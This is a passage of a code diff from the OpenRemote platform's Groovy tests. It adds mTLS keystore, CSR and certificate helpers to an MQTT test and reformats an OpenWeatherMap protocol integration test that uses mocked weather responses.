+    then: "the protocol should authenticate and the agent status should become CONNECTED"
+    conditions.eventually {
+      agent = assetStorageService.find(agent.id, Agent.class)
+      assert agent.getAgentStatus().orElse(null) == ConnectionStatus.CONNECTED
     }
 
-    KeyStore importCertificate(KeyStore keyStore, String alias, String signedCertPem, char[] keystorePassword) {
-        try {
-            // Convert PEM to X509Certificate
-            byte[] certBytes = Base64.decoder.decode(signedCertPem
-                    .replace("-----BEGIN CERTIFICATE-----", "")
-                    .replace("-----END CERTIFICATE-----", "")
-                    .replaceAll("\\s", ""))
-            CertificateFactory certFactory = CertificateFactory.getInstance("X.509")
-            X509Certificate signedCert = certFactory.generateCertificate(new ByteArrayInputStream(certBytes))
+    when: "the agent is connected, show the SSL certificates used"
+    def protocol = agent.getProtocolInstance() as MQTTProtocol
+    then: "test"
+    protocol.properties
+  }
 
-            // Set the certificate chain
-            Certificate[] certChain = [signedCert] as Certificate[]
-            keyStore.setKeyEntry(alias, keyStore.getKey(alias, keystorePassword), keystorePassword, certChain)
 
-            return keyStore
-        } catch (Exception e) {
-            e.printStackTrace()
-        }
+  KeyStore createKeystore(KeyStore keyStore, String alias, String keyPassword) {
+    // Create a new keypair
+    KeyPairGenerator keyGen = KeyPairGenerator.getInstance("RSA")
+    keyGen.initialize(2048)
+    def keyPair = keyGen.generateKeyPair()
+
+    /// Generate a self-signed certificate
+    X500Name subject = new X500Name("CN=mTLS Test,OU=OpenRemote,O=OpenRemote,L=Eindhoven,ST=Noord-Brabant,C=NL")
+    long now = System.currentTimeMillis()
+    Date startDate = new Date(now)
+    Date endDate = new Date(now + 365 * 86400000L)
+    X509v3CertificateBuilder certBuilder = new JcaX509v3CertificateBuilder(
+            subject,
+            BigInteger.valueOf(now),
+            startDate,
+            endDate,
+            subject,
+            keyPair.getPublic()
+            )
+
+
+    ContentSigner contentSigner = new JcaContentSignerBuilder("SHA256WithRSA").build(keyPair.getPrivate())
+    X509Certificate cert = new JcaX509CertificateConverter().getCertificate(certBuilder.build(contentSigner))
+
+    keyStore.setKeyEntry(alias, keyPair.getPrivate(), keyPassword.toCharArray(), new X509Certificate[] {
+              cert
+            })
+
+    // Store the keystore
+    return keyStore
+  }
+
+  X509Certificate getCertificate(String url) {
+    URL pemUrl = new URL(url)
+    CertificateFactory cf = CertificateFactory.getInstance("X.509")
+    X509Certificate cert = (X509Certificate) cf.generateCertificate(pemUrl.openStream())
+
+    return cert
+  }
+
+  String generateCSR(KeyStore keyStore, String alias, String keyPassword) {
+
+    // Retrieve the Private Key and Certificate
+    PrivateKey privateKey = (PrivateKey) keyStore.getKey(alias, keyPassword.toCharArray())
+    Certificate cert = keyStore.getCertificate(alias)
+    X509Certificate x509Cert = (X509Certificate) cert
+
+    // Build X500Name from the Certificate's Subject
+    X500Name x500Name = new X500Name(x509Cert.getSubjectX500Principal().getName())
+
+    // Build ContentSigner
+    ContentSigner signer = new JcaContentSignerBuilder("SHA256withRSA").build(privateKey)
+
+    // Build PKCS10CertificationRequest
+    JcaPKCS10CertificationRequestBuilder csrBuilder = new JcaPKCS10CertificationRequestBuilder(x500Name, x509Cert.getPublicKey())
+    PKCS10CertificationRequest csr = csrBuilder.build(signer)
+
+    String csrPEM
+    try (StringWriter stringWriter = new StringWriter()
+    PemWriter pemWriter = new PemWriter(stringWriter)) {
+      pemWriter.writeObject(new PemObject("CERTIFICATE REQUEST", csr.getEncoded()))
+      pemWriter.flush()
+      csrPEM = stringWriter.toString()
     }
+    return csrPEM
+  }
+
+  KeyStore importCertificate(KeyStore keyStore, String alias, String signedCertPem, char[] keystorePassword) {
+    try {
+      // Convert PEM to X509Certificate
+      byte[] certBytes = Base64.decoder.decode(signedCertPem
+              .replace("-----BEGIN CERTIFICATE-----", "")
+              .replace("-----END CERTIFICATE-----", "")
+              .replaceAll("\\s", ""))
+      CertificateFactory certFactory = CertificateFactory.getInstance("X.509")
+      X509Certificate signedCert = certFactory.generateCertificate(new ByteArrayInputStream(certBytes))
+
+      // Set the certificate chain
+      Certificate[] certChain = [signedCert] as Certificate[]
+      keyStore.setKeyEntry(alias, keyStore.getKey(alias, keystorePassword), keystorePassword, certChain)
+
+      return keyStore
+    } catch (Exception e) {
+      e.printStackTrace()
+    }
+  }
 }

--- a/test/src/test/groovy/org/openremote/test/protocol/openweathermap/OpenWeatherMapProtocolTest.groovy
+++ b/test/src/test/groovy/org/openremote/test/protocol/openweathermap/OpenWeatherMapProtocolTest.groovy
@@ -48,32 +48,32 @@ import static org.openremote.model.value.MetaItemType.AGENT_LINK
 
 class OpenWeatherMapProtocolTest extends Specification implements ManagerContainerTrait {
 
-    @Shared
-    def mockServer = new ClientRequestFilter() {
+  @Shared
+  def mockServer = new ClientRequestFilter() {
 
-        boolean finished = false
+    boolean finished = false
 
-        @Override
-        void filter(ClientRequestContext requestContext) throws IOException {
-            if (finished) {
-                return
-            }
-            def requestUri = requestContext.uri
+    @Override
+    void filter(ClientRequestContext requestContext) throws IOException {
+      if (finished) {
+        return
+      }
+      def requestUri = requestContext.uri
 
-            switch (requestUri.host) {
-                case "api.openweathermap.org":
-                    if (requestUri.path.startsWith("/data/3.0/onecall")) {
-                    def now = LocalDateTime.now().truncatedTo(ChronoUnit.HOURS)
+      switch (requestUri.host) {
+        case "api.openweathermap.org":
+          if (requestUri.path.startsWith("/data/3.0/onecall")) {
+            def now = LocalDateTime.now().truncatedTo(ChronoUnit.HOURS)
 
-                    // Extract location from query parameters
-                    def queryParams = requestUri.query.split("&")
-                    def lat = queryParams.find { it.startsWith("lat=") }?.split("=")[1]
-                    def lon = queryParams.find { it.startsWith("lon=") }?.split("=")[1]
+            // Extract location from query parameters
+            def queryParams = requestUri.query.split("&")
+            def lat = queryParams.find { it.startsWith("lat=") }?.split("=")[1]
+            def lon = queryParams.find { it.startsWith("lon=") }?.split("=")[1]
 
-                    def content
-                    if (lat == "52.3676" && lon == "4.9041") {
-                        // Amsterdam weather data
-                        content = """{
+            def content
+            if (lat == "52.3676" && lon == "4.9041") {
+              // Amsterdam weather data
+              content = """{
                         "current": {
                             "dt": ${now.toEpochSecond(ZoneOffset.UTC)},
                             "temp": 15.5,
@@ -144,10 +144,9 @@ class OpenWeatherMapProtocolTest extends Specification implements ManagerContain
                             }
                         ]
                     }"""
-
-                    } else if (lat == "51.5072" && lon == "-0.1276") {
-                        // London weather data (different values)
-                        content = """{
+            } else if (lat == "51.5072" && lon == "-0.1276") {
+              // London weather data (different values)
+              content = """{
                         "current": {
                             "dt": ${now.toEpochSecond(ZoneOffset.UTC)},
                             "temp": 12.3,
@@ -218,199 +217,203 @@ class OpenWeatherMapProtocolTest extends Specification implements ManagerContain
                             }
                         ]
                     }"""
-                    }
-
-                    def responseBody = ValueUtil.JSON.readValue(content, OpenWeatherMapResponse.class)
-                    requestContext.abortWith(
-                        Response.ok(responseBody, MediaType.APPLICATION_JSON_TYPE).build()
-                    )
-                    return
-                    }
-                    break
             }
 
-            requestContext.abortWith(Response.serverError().build())
-        }
+            def responseBody = ValueUtil.JSON.readValue(content, OpenWeatherMapResponse.class)
+            requestContext.abortWith(
+                    Response.ok(responseBody, MediaType.APPLICATION_JSON_TYPE).build()
+                    )
+            return
+          }
+          break
+      }
+
+      requestContext.abortWith(Response.serverError().build())
+    }
+  }
+
+  def "OpenWeatherMap Integration Tests"() {
+    given: "the container environment is started"
+    def conditions = new PollingConditions(timeout: 10, delay: 0.2)
+    WebTargetBuilder.client.register(mockServer, Integer.MAX_VALUE)
+    def container = startContainer(defaultConfig(), defaultServices())
+    def assetStorageService = container.getService(AssetStorageService.class)
+    def assetPredictedDatapointService = container.getService(AssetPredictedDatapointService.class)
+    def agentService = container.getService(AgentService.class)
+
+    when: "a OpenWeatherMap agent is created"
+    def agent = new OpenWeatherMapAgent("Weather Agent")
+    agent.setRealm(MASTER_REALM)
+    agent.setAPIKey("test-key")
+    agent = assetStorageService.merge(agent)
+
+    then: "the protocol instance for the agent should be created"
+    conditions.eventually {
+      assert agentService.getProtocolInstance(agent.id) != null
+      assert ((OpenWeatherMapProtocol)agentService.getProtocolInstance(agent.id)) != null
     }
 
-    def "OpenWeatherMap Integration Tests"() {
-        given: "the container environment is started"
-        def conditions = new PollingConditions(timeout: 10, delay: 0.2)
-        WebTargetBuilder.client.register(mockServer, Integer.MAX_VALUE)
-        def container = startContainer(defaultConfig(), defaultServices())
-        def assetStorageService = container.getService(AssetStorageService.class)
-        def assetPredictedDatapointService = container.getService(AssetPredictedDatapointService.class)
-        def agentService = container.getService(AgentService.class)
-
-        when: "a OpenWeatherMap agent is created"
-        def agent = new OpenWeatherMapAgent("Weather Agent")
-        agent.setRealm(MASTER_REALM)
-        agent.setAPIKey("test-key")
-        agent = assetStorageService.merge(agent)
-
-        then: "the protocol instance for the agent should be created"
-        conditions.eventually {
-            assert agentService.getProtocolInstance(agent.id) != null
-            assert ((OpenWeatherMapProtocol)agentService.getProtocolInstance(agent.id)) != null
-        }
-
-        and: "the connection status for the agent should be CONNECTED"
-        conditions.eventually {
-            agent = assetStorageService.find(agent.getId())
-            agentService.getAgent(agent.id).getAgentStatus().orElse(null) == ConnectionStatus.CONNECTED
-        }
-
-        when: "a weather asset is provisioned"
-        def protocol = (OpenWeatherMapProtocol) agentService.getProtocolInstance(agent.id)
-        // Attributes are linked asynchronously and only linked attributes are updated, so linking must be awaited
-        // before each update is triggered
-        def linkedAttributeCount = { assetId -> protocol.getLinkedAttributes().keySet().count { it.id == assetId } }
-        def weatherAsset = protocol.provisionWeatherAsset()
-
-        then: "the weather asset should be provisioned"
-        conditions.eventually {
-            weatherAsset = assetStorageService.find(weatherAsset.id)
-            assert weatherAsset != null
-            assert weatherAsset.id != null
-            assert weatherAsset.name == "Weather"
-            assert weatherAsset.realm == agent.realm
-            assert weatherAsset.parentId == agent.id
-        }
-
-        and: "the attributes for the weather asset should be linked to the agent"
-        conditions.eventually {
-            assert weatherAsset.getAttribute(WeatherAsset.TEMPERATURE).get().hasMeta(AGENT_LINK)
-            assert weatherAsset.getAttribute(WeatherAsset.HUMIDITY).get().hasMeta(AGENT_LINK)
-            assert weatherAsset.getAttribute(WeatherAsset.ATMOSPHERIC_PRESSURE).get().hasMeta(AGENT_LINK)
-            assert weatherAsset.getAttribute(WeatherAsset.WIND_SPEED).get().hasMeta(AGENT_LINK)
-            assert weatherAsset.getAttribute(WeatherAsset.WIND_DIRECTION).get().hasMeta(AGENT_LINK)
-            assert weatherAsset.getAttribute(WeatherAsset.WIND_GUST_SPEED).get().hasMeta(AGENT_LINK)
-            assert weatherAsset.getAttribute(WeatherAsset.CLOUD_COVERAGE).get().hasMeta(AGENT_LINK)
-            assert weatherAsset.getAttribute(WeatherAsset.PROBABILITY_OF_PRECIPITATION).get().hasMeta(AGENT_LINK)
-            assert weatherAsset.getAttribute(WeatherAsset.RAINFALL).get().hasMeta(AGENT_LINK)
-            assert weatherAsset.getAttribute(WeatherAsset.UV_INDEX).get().hasMeta(AGENT_LINK)
-            assert linkedAttributeCount(weatherAsset.id) == 10
-        }
-
-
-        when: "a weather update is triggered but the weather asset has no location set"
-        protocol.updateAllLinkedAttributes()
-
-        then: "no weather data should be updated since location is unknown"
-        conditions.eventually {
-            weatherAsset = assetStorageService.find(weatherAsset.id)
-            assert weatherAsset.getAttribute(WeatherAsset.TEMPERATURE).get().getValue().orElse(null) == null
-            assert weatherAsset.getAttribute(WeatherAsset.HUMIDITY).get().getValue().orElse(null) == null
-            assert weatherAsset.getAttribute(WeatherAsset.ATMOSPHERIC_PRESSURE).get().getValue().orElse(null) == null
-            assert weatherAsset.getAttribute(WeatherAsset.WIND_SPEED).get().getValue().orElse(null) == null
-            assert weatherAsset.getAttribute(WeatherAsset.WIND_DIRECTION).get().getValue().orElse(null) == null
-            assert weatherAsset.getAttribute(WeatherAsset.WIND_GUST_SPEED).get().getValue().orElse(null) == null
-            assert weatherAsset.getAttribute(WeatherAsset.CLOUD_COVERAGE).get().getValue().orElse(null) == null
-            assert weatherAsset.getAttribute(WeatherAsset.PROBABILITY_OF_PRECIPITATION).get().getValue().orElse(null) == null
-            assert weatherAsset.getAttribute(WeatherAsset.RAINFALL).get().getValue().orElse(null) == null
-            assert weatherAsset.getAttribute(WeatherAsset.UV_INDEX).get().getValue().orElse(null) == null
-        }
-
-        when: "the weather asset has its location set"
-        weatherAsset.setLocation(new GeoJSONPoint(4.9041d, 52.3676d))
-        weatherAsset = assetStorageService.merge(weatherAsset)
-
-        then: "the weather asset should have its location set"
-        conditions.eventually {
-            weatherAsset = assetStorageService.find(weatherAsset.id)
-            assert weatherAsset != null
-            assert weatherAsset.getLocation().map{it.x}.orElse(null) == 4.9041d
-            assert weatherAsset.getLocation().map{it.y}.orElse(null) == 52.3676d
-        }
-
-        when: "a weather update is triggered once the attributes are linked again after the merge"
-        conditions.eventually {
-            assert linkedAttributeCount(weatherAsset.id) == 10
-        }
-        protocol.updateAllLinkedAttributes()
-
-        then: "the weather data should be updated with current values according to the asset's location"
-        conditions.eventually {
-            weatherAsset = assetStorageService.find(weatherAsset.id)
-            assert weatherAsset.getAttribute(WeatherAsset.TEMPERATURE).get().getValue().orElse(null) == 15.5d
-            assert weatherAsset.getAttribute(WeatherAsset.HUMIDITY).get().getValue().orElse(null) == 65
-            assert weatherAsset.getAttribute(WeatherAsset.ATMOSPHERIC_PRESSURE).get().getValue().orElse(null) == 1013
-            assert weatherAsset.getAttribute(WeatherAsset.WIND_SPEED).get().getValue().orElse(null) == OpenWeatherMapProtocol.convertMsToKmh(3.2d)
-            assert weatherAsset.getAttribute(WeatherAsset.WIND_DIRECTION).get().getValue().orElse(null) == 180
-            assert weatherAsset.getAttribute(WeatherAsset.WIND_GUST_SPEED).get().getValue().orElse(null) == OpenWeatherMapProtocol.convertMsToKmh(4.1d)
-            assert weatherAsset.getAttribute(WeatherAsset.CLOUD_COVERAGE).get().getValue().orElse(null) == 20
-            assert weatherAsset.getAttribute(WeatherAsset.PROBABILITY_OF_PRECIPITATION).get().getValue().orElse(null) == 0.1d
-            assert weatherAsset.getAttribute(WeatherAsset.RAINFALL).get().getValue().orElse(null) == 0.5d
-            assert weatherAsset.getAttribute(WeatherAsset.UV_INDEX).get().getValue().orElse(null) == 2.5d
-        }
-
-        and: "the predicted data points should be written"
-        conditions.eventually {
-            // We expect 3 predicted datapoints (response has 4, but 3 unique timestamps)
-            assert assetPredictedDatapointService.getDatapoints(new AttributeRef(weatherAsset.id, WeatherAsset.TEMPERATURE.name)).size() == 3
-            assert assetPredictedDatapointService.getDatapoints(new AttributeRef(weatherAsset.id, WeatherAsset.HUMIDITY.name)).size() == 3
-            assert assetPredictedDatapointService.getDatapoints(new AttributeRef(weatherAsset.id, WeatherAsset.ATMOSPHERIC_PRESSURE.name)).size() == 3
-            assert assetPredictedDatapointService.getDatapoints(new AttributeRef(weatherAsset.id, WeatherAsset.WIND_SPEED.name)).size() == 3
-            assert assetPredictedDatapointService.getDatapoints(new AttributeRef(weatherAsset.id, WeatherAsset.WIND_DIRECTION.name)).size() == 3
-            assert assetPredictedDatapointService.getDatapoints(new AttributeRef(weatherAsset.id, WeatherAsset.WIND_GUST_SPEED.name)).size() == 3
-            assert assetPredictedDatapointService.getDatapoints(new AttributeRef(weatherAsset.id, WeatherAsset.CLOUD_COVERAGE.name)).size() == 3
-            assert assetPredictedDatapointService.getDatapoints(new AttributeRef(weatherAsset.id, WeatherAsset.PROBABILITY_OF_PRECIPITATION.name)).size() == 3
-            assert assetPredictedDatapointService.getDatapoints(new AttributeRef(weatherAsset.id, WeatherAsset.RAINFALL.name)).size() == 3
-            assert assetPredictedDatapointService.getDatapoints(new AttributeRef(weatherAsset.id, WeatherAsset.UV_INDEX.name)).size() == 3
-        }
-
-        when: "another weather asset is provisioned with a different location"
-        def weatherAsset2 = protocol.provisionWeatherAsset()
-        weatherAsset2.setLocation(new GeoJSONPoint(-0.1276d, 51.5072d))
-        weatherAsset2 = assetStorageService.merge(weatherAsset2)
-
-        then: "the weather asset should be available and have its location set"
-        conditions.eventually {
-            weatherAsset2 = assetStorageService.find(weatherAsset2.id)
-            assert weatherAsset2 != null
-            assert weatherAsset2.id != null
-            assert weatherAsset2.name == "Weather"
-            assert weatherAsset2.realm == agent.realm
-            assert weatherAsset2.parentId == agent.id
-            assert weatherAsset2.getLocation().map{it.x}.orElse(null) == -0.1276d
-            assert weatherAsset2.getLocation().map{it.y}.orElse(null) == 51.5072d
-            assert linkedAttributeCount(weatherAsset2.id) == 10
-        }
-
-        when: "a weather update is triggered"
-        protocol.updateAllLinkedAttributes()
-
-        then: "the weather data should be updated with current values according to the asset's location"
-        conditions.eventually {
-            weatherAsset2 = assetStorageService.find(weatherAsset2.id)
-            assert weatherAsset2.getAttribute(WeatherAsset.TEMPERATURE).get().getValue().orElse(null) == 12.3d
-            assert weatherAsset2.getAttribute(WeatherAsset.HUMIDITY).get().getValue().orElse(null) == 78
-            assert weatherAsset2.getAttribute(WeatherAsset.ATMOSPHERIC_PRESSURE).get().getValue().orElse(null) == 1008
-            assert weatherAsset2.getAttribute(WeatherAsset.WIND_SPEED).get().getValue().orElse(null) == OpenWeatherMapProtocol.convertMsToKmh(4.5d)
-            assert weatherAsset2.getAttribute(WeatherAsset.WIND_DIRECTION).get().getValue().orElse(null) == 220
-            assert weatherAsset2.getAttribute(WeatherAsset.WIND_GUST_SPEED).get().getValue().orElse(null) == OpenWeatherMapProtocol.convertMsToKmh(5.2d)
-            assert weatherAsset2.getAttribute(WeatherAsset.CLOUD_COVERAGE).get().getValue().orElse(null) == 45
-            assert weatherAsset2.getAttribute(WeatherAsset.PROBABILITY_OF_PRECIPITATION).get().getValue().orElse(null) == 0.3d
-            assert weatherAsset2.getAttribute(WeatherAsset.RAINFALL).get().getValue().orElse(null) == 1.2d
-            assert weatherAsset2.getAttribute(WeatherAsset.UV_INDEX).get().getValue().orElse(null) == 1.8d
-        }
-
-        and: "the predicted data points should be written"
-        conditions.eventually {
-            // We expect 3 predicted datapoints (response has 4, but 3 unique timestamps)
-            assert assetPredictedDatapointService.getDatapoints(new AttributeRef(weatherAsset2.id, WeatherAsset.TEMPERATURE.name)).size() == 3
-            assert assetPredictedDatapointService.getDatapoints(new AttributeRef(weatherAsset2.id, WeatherAsset.HUMIDITY.name)).size() == 3
-            assert assetPredictedDatapointService.getDatapoints(new AttributeRef(weatherAsset2.id, WeatherAsset.ATMOSPHERIC_PRESSURE.name)).size() == 3
-            assert assetPredictedDatapointService.getDatapoints(new AttributeRef(weatherAsset2.id, WeatherAsset.WIND_SPEED.name)).size() == 3
-            assert assetPredictedDatapointService.getDatapoints(new AttributeRef(weatherAsset2.id, WeatherAsset.WIND_DIRECTION.name)).size() == 3
-            assert assetPredictedDatapointService.getDatapoints(new AttributeRef(weatherAsset2.id, WeatherAsset.WIND_GUST_SPEED.name)).size() == 3
-            assert assetPredictedDatapointService.getDatapoints(new AttributeRef(weatherAsset2.id, WeatherAsset.CLOUD_COVERAGE.name)).size() == 3
-            assert assetPredictedDatapointService.getDatapoints(new AttributeRef(weatherAsset2.id, WeatherAsset.PROBABILITY_OF_PRECIPITATION.name)).size() == 3
-            assert assetPredictedDatapointService.getDatapoints(new AttributeRef(weatherAsset2.id, WeatherAsset.RAINFALL.name)).size() == 3
-            assert assetPredictedDatapointService.getDatapoints(new AttributeRef(weatherAsset2.id, WeatherAsset.UV_INDEX.name)).size() == 3
-        }
-
-        cleanup: "disable mock filter"
-        mockServer.finished = true
+    and: "the connection status for the agent should be CONNECTED"
+    conditions.eventually {
+      agent = assetStorageService.find(agent.getId())
+      agentService.getAgent(agent.id).getAgentStatus().orElse(null) == ConnectionStatus.CONNECTED
     }
+
+    when: "a weather asset is provisioned"
+    def protocol = (OpenWeatherMapProtocol) agentService.getProtocolInstance(agent.id)
+    // Attributes are linked asynchronously and only linked attributes are updated, so linking must be awaited
+    // before each update is triggered
+    def linkedAttributeCount = { assetId ->
+      protocol.getLinkedAttributes().keySet().count {
+        it.id == assetId
+      }
+    }
+    def weatherAsset = protocol.provisionWeatherAsset()
+
+    then: "the weather asset should be provisioned"
+    conditions.eventually {
+      weatherAsset = assetStorageService.find(weatherAsset.id)
+      assert weatherAsset != null
+      assert weatherAsset.id != null
+      assert weatherAsset.name == "Weather"
+      assert weatherAsset.realm == agent.realm
+      assert weatherAsset.parentId == agent.id
+    }
+
+    and: "the attributes for the weather asset should be linked to the agent"
+    conditions.eventually {
+      assert weatherAsset.getAttribute(WeatherAsset.TEMPERATURE).get().hasMeta(AGENT_LINK)
+      assert weatherAsset.getAttribute(WeatherAsset.HUMIDITY).get().hasMeta(AGENT_LINK)
+      assert weatherAsset.getAttribute(WeatherAsset.ATMOSPHERIC_PRESSURE).get().hasMeta(AGENT_LINK)
+      assert weatherAsset.getAttribute(WeatherAsset.WIND_SPEED).get().hasMeta(AGENT_LINK)
+      assert weatherAsset.getAttribute(WeatherAsset.WIND_DIRECTION).get().hasMeta(AGENT_LINK)
+      assert weatherAsset.getAttribute(WeatherAsset.WIND_GUST_SPEED).get().hasMeta(AGENT_LINK)
+      assert weatherAsset.getAttribute(WeatherAsset.CLOUD_COVERAGE).get().hasMeta(AGENT_LINK)
+      assert weatherAsset.getAttribute(WeatherAsset.PROBABILITY_OF_PRECIPITATION).get().hasMeta(AGENT_LINK)
+      assert weatherAsset.getAttribute(WeatherAsset.RAINFALL).get().hasMeta(AGENT_LINK)
+      assert weatherAsset.getAttribute(WeatherAsset.UV_INDEX).get().hasMeta(AGENT_LINK)
+      assert linkedAttributeCount(weatherAsset.id) == 10
+    }
+
+
+    when: "a weather update is triggered but the weather asset has no location set"
+    protocol.updateAllLinkedAttributes()
+
+    then: "no weather data should be updated since location is unknown"
+    conditions.eventually {
+      weatherAsset = assetStorageService.find(weatherAsset.id)
+      assert weatherAsset.getAttribute(WeatherAsset.TEMPERATURE).get().getValue().orElse(null) == null
+      assert weatherAsset.getAttribute(WeatherAsset.HUMIDITY).get().getValue().orElse(null) == null
+      assert weatherAsset.getAttribute(WeatherAsset.ATMOSPHERIC_PRESSURE).get().getValue().orElse(null) == null
+      assert weatherAsset.getAttribute(WeatherAsset.WIND_SPEED).get().getValue().orElse(null) == null
+      assert weatherAsset.getAttribute(WeatherAsset.WIND_DIRECTION).get().getValue().orElse(null) == null
+      assert weatherAsset.getAttribute(WeatherAsset.WIND_GUST_SPEED).get().getValue().orElse(null) == null
+      assert weatherAsset.getAttribute(WeatherAsset.CLOUD_COVERAGE).get().getValue().orElse(null) == null
+      assert weatherAsset.getAttribute(WeatherAsset.PROBABILITY_OF_PRECIPITATION).get().getValue().orElse(null) == null
+      assert weatherAsset.getAttribute(WeatherAsset.RAINFALL).get().getValue().orElse(null) == null
+      assert weatherAsset.getAttribute(WeatherAsset.UV_INDEX).get().getValue().orElse(null) == null
+    }
+
+    when: "the weather asset has its location set"
+    weatherAsset.setLocation(new GeoJSONPoint(4.9041d, 52.3676d))
+    weatherAsset = assetStorageService.merge(weatherAsset)
+
+    then: "the weather asset should have its location set"
+    conditions.eventually {
+      weatherAsset = assetStorageService.find(weatherAsset.id)
+      assert weatherAsset != null
+      assert weatherAsset.getLocation().map{it.x}.orElse(null) == 4.9041d
+      assert weatherAsset.getLocation().map{it.y}.orElse(null) == 52.3676d
+    }
+
+    when: "a weather update is triggered once the attributes are linked again after the merge"
+    conditions.eventually {
+      assert linkedAttributeCount(weatherAsset.id) == 10
+    }
+    protocol.updateAllLinkedAttributes()
+
+    then: "the weather data should be updated with current values according to the asset's location"
+    conditions.eventually {
+      weatherAsset = assetStorageService.find(weatherAsset.id)
+      assert weatherAsset.getAttribute(WeatherAsset.TEMPERATURE).get().getValue().orElse(null) == 15.5d
+      assert weatherAsset.getAttribute(WeatherAsset.HUMIDITY).get().getValue().orElse(null) == 65
+      assert weatherAsset.getAttribute(WeatherAsset.ATMOSPHERIC_PRESSURE).get().getValue().orElse(null) == 1013
+      assert weatherAsset.getAttribute(WeatherAsset.WIND_SPEED).get().getValue().orElse(null) == OpenWeatherMapProtocol.convertMsToKmh(3.2d)
+      assert weatherAsset.getAttribute(WeatherAsset.WIND_DIRECTION).get().getValue().orElse(null) == 180
+      assert weatherAsset.getAttribute(WeatherAsset.WIND_GUST_SPEED).get().getValue().orElse(null) == OpenWeatherMapProtocol.convertMsToKmh(4.1d)
+      assert weatherAsset.getAttribute(WeatherAsset.CLOUD_COVERAGE).get().getValue().orElse(null) == 20
+      assert weatherAsset.getAttribute(WeatherAsset.PROBABILITY_OF_PRECIPITATION).get().getValue().orElse(null) == 0.1d
+      assert weatherAsset.getAttribute(WeatherAsset.RAINFALL).get().getValue().orElse(null) == 0.5d
+      assert weatherAsset.getAttribute(WeatherAsset.UV_INDEX).get().getValue().orElse(null) == 2.5d
+    }
+
+    and: "the predicted data points should be written"
+    conditions.eventually {
+      // We expect 3 predicted datapoints (response has 4, but 3 unique timestamps)
+      assert assetPredictedDatapointService.getDatapoints(new AttributeRef(weatherAsset.id, WeatherAsset.TEMPERATURE.name)).size() == 3
+      assert assetPredictedDatapointService.getDatapoints(new AttributeRef(weatherAsset.id, WeatherAsset.HUMIDITY.name)).size() == 3
+      assert assetPredictedDatapointService.getDatapoints(new AttributeRef(weatherAsset.id, WeatherAsset.ATMOSPHERIC_PRESSURE.name)).size() == 3
+      assert assetPredictedDatapointService.getDatapoints(new AttributeRef(weatherAsset.id, WeatherAsset.WIND_SPEED.name)).size() == 3
+      assert assetPredictedDatapointService.getDatapoints(new AttributeRef(weatherAsset.id, WeatherAsset.WIND_DIRECTION.name)).size() == 3
+      assert assetPredictedDatapointService.getDatapoints(new AttributeRef(weatherAsset.id, WeatherAsset.WIND_GUST_SPEED.name)).size() == 3
+      assert assetPredictedDatapointService.getDatapoints(new AttributeRef(weatherAsset.id, WeatherAsset.CLOUD_COVERAGE.name)).size() == 3
+      assert assetPredictedDatapointService.getDatapoints(new AttributeRef(weatherAsset.id, WeatherAsset.PROBABILITY_OF_PRECIPITATION.name)).size() == 3
+      assert assetPredictedDatapointService.getDatapoints(new AttributeRef(weatherAsset.id, WeatherAsset.RAINFALL.name)).size() == 3
+      assert assetPredictedDatapointService.getDatapoints(new AttributeRef(weatherAsset.id, WeatherAsset.UV_INDEX.name)).size() == 3
+    }
+
+    when: "another weather asset is provisioned with a different location"
+    def weatherAsset2 = protocol.provisionWeatherAsset()
+    weatherAsset2.setLocation(new GeoJSONPoint(-0.1276d, 51.5072d))
+    weatherAsset2 = assetStorageService.merge(weatherAsset2)
+
+    then: "the weather asset should be available and have its location set"
+    conditions.eventually {
+      weatherAsset2 = assetStorageService.find(weatherAsset2.id)
+      assert weatherAsset2 != null
+      assert weatherAsset2.id != null
+      assert weatherAsset2.name == "Weather"
+      assert weatherAsset2.realm == agent.realm
+      assert weatherAsset2.parentId == agent.id
+      assert weatherAsset2.getLocation().map{it.x}.orElse(null) == -0.1276d
+      assert weatherAsset2.getLocation().map{it.y}.orElse(null) == 51.5072d
+      assert linkedAttributeCount(weatherAsset2.id) == 10
+    }
+
+    when: "a weather update is triggered"
+    protocol.updateAllLinkedAttributes()
+
+    then: "the weather data should be updated with current values according to the asset's location"
+    conditions.eventually {
+      weatherAsset2 = assetStorageService.find(weatherAsset2.id)
+      assert weatherAsset2.getAttribute(WeatherAsset.TEMPERATURE).get().getValue().orElse(null) == 12.3d
+      assert weatherAsset2.getAttribute(WeatherAsset.HUMIDITY).get().getValue().orElse(null) == 78
+      assert weatherAsset2.getAttribute(WeatherAsset.ATMOSPHERIC_PRESSURE).get().getValue().orElse(null) == 1008
+      assert weatherAsset2.getAttribute(WeatherAsset.WIND_SPEED).get().getValue().orElse(null) == OpenWeatherMapProtocol.convertMsToKmh(4.5d)
+      assert weatherAsset2.getAttribute(WeatherAsset.WIND_DIRECTION).get().getValue().orElse(null) == 220
+      assert weatherAsset2.getAttribute(WeatherAsset.WIND_GUST_SPEED).get().getValue().orElse(null) == OpenWeatherMapProtocol.convertMsToKmh(5.2d)
+      assert weatherAsset2.getAttribute(WeatherAsset.CLOUD_COVERAGE).get().getValue().orElse(null) == 45
+      assert weatherAsset2.getAttribute(WeatherAsset.PROBABILITY_OF_PRECIPITATION).get().getValue().orElse(null) == 0.3d
+      assert weatherAsset2.getAttribute(WeatherAsset.RAINFALL).get().getValue().orElse(null) == 1.2d
+      assert weatherAsset2.getAttribute(WeatherAsset.UV_INDEX).get().getValue().orElse(null) == 1.8d
+    }
+
+    and: "the predicted data points should be written"
+    conditions.eventually {
+      // We expect 3 predicted datapoints (response has 4, but 3 unique timestamps)
+      assert assetPredictedDatapointService.getDatapoints(new AttributeRef(weatherAsset2.id, WeatherAsset.TEMPERATURE.name)).size() == 3
+      assert assetPredictedDatapointService.getDatapoints(new AttributeRef(weatherAsset2.id, WeatherAsset.HUMIDITY.name)).size() == 3
+      assert assetPredictedDatapointService.getDatapoints(new AttributeRef(weatherAsset2.id, WeatherAsset.ATMOSPHERIC_PRESSURE.name)).size() == 3
+      assert assetPredictedDatapointService.getDatapoints(new AttributeRef(weatherAsset2.id, WeatherAsset.WIND_SPEED.name)).size() == 3
+      assert assetPredictedDatapointService.getDatapoints(new AttributeRef(weatherAsset2.id, WeatherAsset.WIND_DIRECTION.name)).size() == 3
+      assert assetPredictedDatapointService.getDatapoints(new AttributeRef(weatherAsset2.id, WeatherAsset.WIND_GUST_SPEED.name)).size() == 3
+      assert assetPredictedDatapointService.getDatapoints(new AttributeRef(weatherAsset2.id, WeatherAsset.CLOUD_COVERAGE.name)).size() == 3
+      assert assetPredictedDatapointService.getDatapoints(new AttributeRef(weatherAsset2.id, WeatherAsset.PROBABILITY_OF_PRECIPITATION.name)).size() == 3
